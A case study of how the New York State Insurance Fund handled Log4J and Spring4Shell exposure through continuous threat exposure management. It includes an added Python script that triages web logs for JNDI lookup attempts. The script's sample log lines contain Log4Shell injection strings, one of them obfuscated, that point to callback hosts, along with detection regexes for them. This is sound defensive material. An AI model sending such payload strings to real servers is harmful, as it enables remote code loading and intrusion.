Case Study: Using Continuous Threat Exposure Management to Address Zero-Day Vulnerabilities

Security and risk management leaders can use this study to see how the New York State Insurance Fund (NYSIF) used a CTEM program to minimize the impact of zero-day vulnerabilities on the organization and ensure they are managed efficiently and effectively.

Case Overview

Problem
  • Despite efforts to improve them, preventative security mechanisms such as patching remain challenging to apply. The ever-increasing volume of threat exposure faced by organizations, together with the complexity, ownership and availability of remedies, limits an organization’s ability to apply basic principles universally. There are too many issues to resolve, and a variety of operational factors influence decision making when deploying patches.
  • The breadth of media coverage of the Log4J and Spring4Shell zero-day vulnerabilities heightened awareness of their existence and made them a topic of interest among senior leaders in the business. However, this interest was not related to any risk-based context specific to the company. Actions were taken to resolve issues, but with no analysis of the genuine risk to the business or the likelihood of an impact.
Action
  • The organization scoped the extent of the issue and limited potential impacts by carrying out actions such as routinely restricting user access to resources as part of a standard security hygiene regime. This ensured that only a limited number of user accounts could exploit specific vulnerabilities, such as Log4J.
  • NYSIF maintained a steady state of awareness of existing security weaknesses and ensured timely updates, proper configuration and patches. This provided a solid baseline from which to understand the priority of risks associated with Log4J, thus enabling the organization to effectively schedule work to remediate exposure.
  • By validating the effectiveness of controls and monitoring through continuous intrusion and behavioral monitoring, NYSIF ensured that any illegitimate activity would be logged and alerted upon. This provided clarity on the extent to which a vulnerability exploit had been attempted, which of those attempts had been successful and which had justified the investment in security tooling.
  • NYSIF requested that internal teams, vendors and partners mobilize to validate actions taken with regard to high-impact vulnerabilities. The organization gathered attestations to establish a compliance evidence base for systems over which the security teams have no direct control.
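One way to operationalize the "attempted versus successful" distinction from the monitoring action above, as an added example that is not part of the original case study or of NYSIF's tooling: it scans constructed web-access and egress-firewall log lines for Log4Shell-style JNDI lookups (including the common obfuscated forms) and marks an attempt as likely successful only when the server was then allowed an outbound connection to the attacker-supplied callback address. The log formats, field layout and 30-second correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample web-access log lines (time, source IP, request, user agent); not real NYSIF data
ACCESS_LOG = [
    '2021-12-10T12:00:01Z 203.0.113.5 "GET /login HTTP/1.1" "Mozilla/5.0"',
    '2021-12-10T12:00:07Z 198.51.100.9 "GET /login HTTP/1.1" "${jndi:ldap://198.51.100.9:1389/a}"',
    '2021-12-10T12:01:15Z 198.51.100.23 "GET /api HTTP/1.1" "${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/x}"',
    '2021-12-10T12:02:00Z 203.0.113.7 "GET /health HTTP/1.1" "curl/7.68"',
]
# Constructed egress-firewall log lines (time, action, destination) for the same web server
EGRESS_LOG = [
    '2021-12-10T12:00:08Z DENY  dst=198.51.100.9:1389',
    '2021-12-10T12:01:16Z ALLOW dst=198.51.100.23:1389',
]

NESTED = re.compile(r'\$\{(?:lower|upper):([a-z])\}', re.I)   # ${lower:j} -> j
EMPTY = re.compile(r'\$\{::-([a-z])\}', re.I)                  # ${::-j}    -> j
JNDI = re.compile(r'\$\{jndi:(\w+)://([^/:}]+)(?::(\d+))?', re.I)

def normalize(s):
    """Collapse the nested-lookup tricks used to hide the literal 'jndi' until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = EMPTY.sub(r'\1', NESTED.sub(r'\1', s))
    return s

def _ts(iso):
    return datetime.fromisoformat(iso.replace('Z', '+00:00'))

def parse_egress(lines):
    """Return (time, destination) pairs for outbound connections the firewall allowed."""
    allowed = []
    for ln in lines:
        ts, action, dst = ln.split()
        if action == 'ALLOW':
            allowed.append((_ts(ts), dst.split('=', 1)[1]))
    return allowed

def triage(access_lines, egress_lines, window=timedelta(seconds=30)):
    """One finding per JNDI lookup attempt, marked 'attempted' or 'likely_successful'."""
    allowed = parse_egress(egress_lines)
    findings = []
    for ln in access_lines:
        m = JNDI.search(normalize(ln))
        if not m:
            continue  # no lookup pattern in any field of this request
        when, src = ln.split()[0], ln.split()[1]
        callback = f'{m.group(2)}:{m.group(3) or "389"}'  # default LDAP port if none given
        # Only an allowed outbound connection to the callback shortly after the request upgrades the finding
        hit = any(d == callback and _ts(when) <= t <= _ts(when) + window for t, d in allowed)
        findings.append({'time': when, 'src': src, 'callback': callback,
                         'status': 'likely_successful' if hit else 'attempted'})
    return findings
```

Attempts with no matching allowed egress still merit a ticket; they show the control that blocked the callback was doing its job, which is the evidence the validation step above asks for.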
Results
  • A continuous threat exposure management (CTEM) approach enabled NYSIF to identify, address and resolve threats without being compromised. The organization should be able to repeat the same processes to address any potential threats that may arise in the future.
  • Structure and repeatability ensure that future results will be measurable and comparable, and that the security teams will be able to improve the speed of response to significant issues and report successes to the management chain effectively.

Problem

Security teams often find themselves addressing security exposures that have no risk-based context specific to their organization. There is often no effective process in place to remediate the problems that are discovered, and those processes that do exist are often overburdened by a volume of issues that exceeds the level of available resources.
Leadership interest in security issues has increased, and many organizations simply focus on being compliant with frameworks such as ISO27001 or NIST. However, while tackling some of those issues that the industry and the media may consider high priority, security organizations may not be reducing relevant risks or preventing high-impact events. Security teams must adjust industry best practices to suit the needs of their organization.